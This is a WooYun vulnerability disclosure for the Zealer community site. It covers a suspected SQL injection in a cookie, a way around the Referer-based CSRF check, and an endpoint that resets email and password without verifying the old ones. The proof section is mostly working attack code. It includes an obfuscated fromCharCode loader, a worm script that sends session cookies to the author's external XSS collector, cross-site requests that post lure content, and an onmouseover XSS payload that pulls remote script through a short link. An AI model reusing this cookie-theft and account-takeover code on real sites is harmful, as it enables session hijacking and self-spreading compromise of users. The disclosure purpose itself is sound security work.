当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159192

漏洞标题:Zealer若干安全漏洞打包(CSRF防御绕过/危险操作接口-可绕过验证改绑重置密码/附POC)

相关厂商:ZEALER

漏洞作者: kevinchowsec

提交时间:2015-12-08 13:14

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

Hi,It's me again,Zealer最近可好?

详细说明:

1、未过滤危险字符,疑似sql注入
http://plus.zealer.com/user/sendMessage
2、CSRF绕过
http://plus.zealer.com/sendPost/post
3、危险操作接口
http://plus.zealer.com/user/userUpdate?name=&email=&password=&resetpwd=
登录状态的用户请求该接口,可以重置昵称(即登录用户名),可绕过旧邮箱验证改绑新的邮箱,可绕过旧密码验证重置新的密码。

漏洞证明:

1、未过滤危险字符,疑似sql注入
http://plus.zealer.com/user/sendMessage

POST /user/sendMessage HTTP/1.1
Host: plus.zealer.com
Content-Length: 22
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://plus.zealer.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://plus.zealer.com/sms?type=dialog&s=473122&a=471292
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: z_q1=03rjuhio1deqpvbo6juuv1oor1'; 
content=22&r_id=473122


这里的cookie z_q1处没有做过滤,其他接口都有↓↓↓↓↓

A1.png


2、CSRF绕过
http://plus.zealer.com/sendPost/post
以社区发帖接口为例,该接口之前没有防御CSRF攻击的措施,我在提交的bug中提及官方并加强了验证[ WooYun: Zealer_CSRF_头像、简介、发帖、评论(附蠕虫POC) ],但是后续我复测后,发现修复的措施仅是增加了referer验证,存在的问题是:
①referer验证不严可以构造特殊referer绕过(Referer: http://www.kevinchow.cn?plus.zealer.com/SendPost)

A2.png


②空referer可绕过(https->http,跨协议间提交请求两种方法可去掉请求中的referer)
此外,值得一提的是,敏感操作接口,GET和POST请求方式都通过。

A3.png


3、危险操作接口
http://plus.zealer.com/user/userUpdate?name=&email=&password=&resetpwd=

GET /user/userUpdate?name=kevintest&phone=15999769669&[email protected]&password=kevinchowsec4&resetpwd=kevinchowsec4 HTTP/1.1
Host: plus.zealer.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: z_q1=dijp4c30om5td7hh6s69******;


A4.png


综上所述,那就是说仍然可以构造蠕虫进行发帖、XSS传播、窃取cookie,然后再访问危险操作接口进行密码重置、邮箱重置,完全控制账户,我不写了,给出片段代码:
利用 xxx.src='javascript:"HTML代码的方式"'; 可以去掉referer,

<iframe id="aa" src=""></iframe>
<script>
document.getElementById("aa").src='javascript:"<html><body>zealer<scr'+'ipt>eval(String.fromCharCode(119, 105, 110, 100, 111, 119, 46, 115, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 57, 57, 44, 49, 49, 52, 44, 49, 48, 53, 44, 49, 49, 50, 44, 49, 49, 54, 41, 41, 59, 119, 105, 110, 100, 111, 119, 46, 115, 46, 115, 114, 99, 61, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 57, 44, 49, 49, 57, 44, 49, 49, 57, 44, 52, 54, 44, 49, 48, 55, 44, 49, 48, 49, 44, 49, 49, 56, 44, 49, 48, 53, 44, 49, 49, 48, 44, 57, 57, 44, 49, 48, 52, 44, 49, 49, 49, 44, 49, 49, 57, 44, 52, 54, 44, 57, 57, 44, 49, 49, 48, 44, 52, 55, 44, 49, 49, 57, 44, 49, 49, 57, 44, 49, 49, 57, 44, 52, 54, 44, 49, 50, 50, 44, 49, 48, 49, 44, 57, 55, 44, 49, 48, 56, 44, 49, 48, 49, 44, 49, 49, 52, 44, 52, 54, 44, 57, 57, 44, 49, 49, 49, 44, 49, 48, 57, 44, 52, 55, 44, 49, 49, 52, 44, 49, 48, 49, 44, 49, 48, 50, 44, 49, 48, 49, 44, 49, 49, 52, 44, 49, 48, 49, 44, 49, 49, 52, 44, 52, 54, 44, 49, 48, 54, 44, 49, 49, 53, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 119, 105, 110, 100, 111, 119, 46, 115, 41))</scr'+'ipt></body></html>"';
</script>


如下为JS功能为:发帖、cookie窃取、头像更改、简介修改

(function(){(new Image()).src='http://www.kevinchow.cn/xss/index.php?do=api&id=Ub2SuC&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if('1'==1){keep=new Image();keep.src='http://www.kevinchow.cn/xss/index.php?do=keepsession&id=Ub2SuC&url='+escape(document.location)+'&cookie='+escape(document.cookie)        (function() { (new Image()).src = 'http://www.kevinchow.cn/xss/index.php?do=api&id=SY4Vjb&location=' + escape((function() {
        try {
            return document.location.href
        } catch(e) {
            return ''
        }
    })()) + '&toplocation=' + escape((function() {
        try {
            return top.location.href
        } catch(e) {
            return ''
        }
    })()) + '&cookie=' + escape((function() {
        try {
            return document.cookie
        } catch(e) {
            return ''
        }
    })()) + '&opener=' + escape((function() {
        try {
            return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
        } catch(e) {
            return ''
        }
    })());
})();
if ('1' == 1) {
    keep = new Image();
    keep.src = 'http://www.kevinchow.cn/xss/index.php?do=keepsession&id=SY4Vjb&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};
function submitRequest() {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://www.zealer.com/user/reUpload", true);
    xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "x=0&y=15.084&w=400.564&h=400.56399999999996&pid=331503";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://www.zealer.com/user/post", true);
    xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "description=%e6%84%9f%e8%b0%a2%e4%bd%a0%e6%9d%a5%e7%9c%8b%e6%88%91%ef%bc%8c%e6%88%91%e6%98%af%e4%bd%a0%e7%9a%84%e5%a5%bd%e4%bc%99%e4%bc%b4%ef%bc%8c%e7%88%b1Zealer%e4%b8%80%e5%a6%82%e6%97%a2%e5%be%80%ef%bc%8c%e9%a9%b7%e9%a9%ac%e9%9a%be%e8%bf%bd%e3%80%82By+the+way%2cPeace%26Love%7e%22onmouseover%3d%22s%3dcreateElement(%27script%27)%3bbody.appendChild(s)%3bs.src%3d%27http%3a%2f%2ft.cn%2fR4PK0GL%27";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
 	var xhr = new XMLHttpRequest();
    xhr.open("POST", "http://plus.zealer.com/sendPost/post", true);
    xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
    xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    xhr.withCredentials = true;
    var body = "type=&title=%23+%E6%99%92%E6%A1%8C%E9%9D%A2%23+Ticwatch+%E5%9C%A3%E8%AF%9E%E7%A4%BC%E7%9B%92%EF%BC%9A%E6%9D%A5%E8%87%AA+ZEALER+%E7%9A%84%E6%9A%96%E5%86%AC%E6%83%8A%E5%96%9C%E3%80%82%E5%85%8D%E8%B4%B9%E9%80%81%E9%80%81%E9%80%81%EF%BC%81+++&color=&tags=0&content=%3Cp+style%3D%22text-align%3A+center%3B%22%3E%0A++++%3Cimg+title%3D%221438053266336696.jpg%22+alt%3D%22ziru.jpg%22+src%3D%22http%3A%2F%2Fimg.zealer.com%2F690%2F0%2F189fe0001ab6f164fcfb281198773d63304.jpg%22%2F%3E%0A%3C%2Fp%3E%0A%3Cp+style%3D%22text-align%3A+center%3B%22%3E%0A++++Ticwatch+%E5%9C%A3%E8%AF%9E%E7%A4%BC%E7%9B%92%EF%BC%9A%E6%9D%A5%E8%87%AA+ZEALER+%E7%9A%84%E6%9A%96%E5%86%AC%E6%83%8A%E5%96%9C%E3%80%82%E5%85%8D%E8%B4%B9%E9%80%81%E9%80%81%E9%80%81%EF%BC%81%0A%3C%2Fp%3E%0A%3Cp+style%3D%22text-align%3A+center%3B%22%3E%0A++++%E8%AF%A6%E6%83%85%E7%82%B9%E5%87%BB%E8%AE%BF%E9%97%AE%E2%86%92+%3Ca+title%3D%22%E7%B3%BB%E7%BB%9F%E7%AB%99%E5%86%85%E4%BF%A1%22+href%3D%22http%3A%2F%2Fplus.zealer.com%2Fuser%3Fid%3D471292%22+target%3D%22blank%22%3E%E7%B3%BB%E7%BB%9F%E7%AB%99%E5%86%85%E4%BF%A1%3C%2Fa%3E%26nbsp%3B%E2%86%90%E5%85%A5%E5%8F%A3%E9%A1%B5%E9%9D%A2%E5%8F%82%E5%8A%A0%EF%BC%81%0A%3C%2Fp%3E&flag=user&postTAG=&postTest=&postID=&postGroup=&upPubtest=";
    var aBody = new Uint8Array(body.length);
    for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
    xhr.send(new Blob([aBody]));
    //var newWindow = window.open('http://plus.zealer.com/user?id=471292');
}
submitRequest();

修复方案:

1、过滤危险字符;
2、referer验证严谨,注意空referer的情况;
3、屏蔽危险操作接口。

版权声明:转载请注明来源 kevinchowsec@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-11 15:06

厂商回复:

正在处理

最新状态:

暂无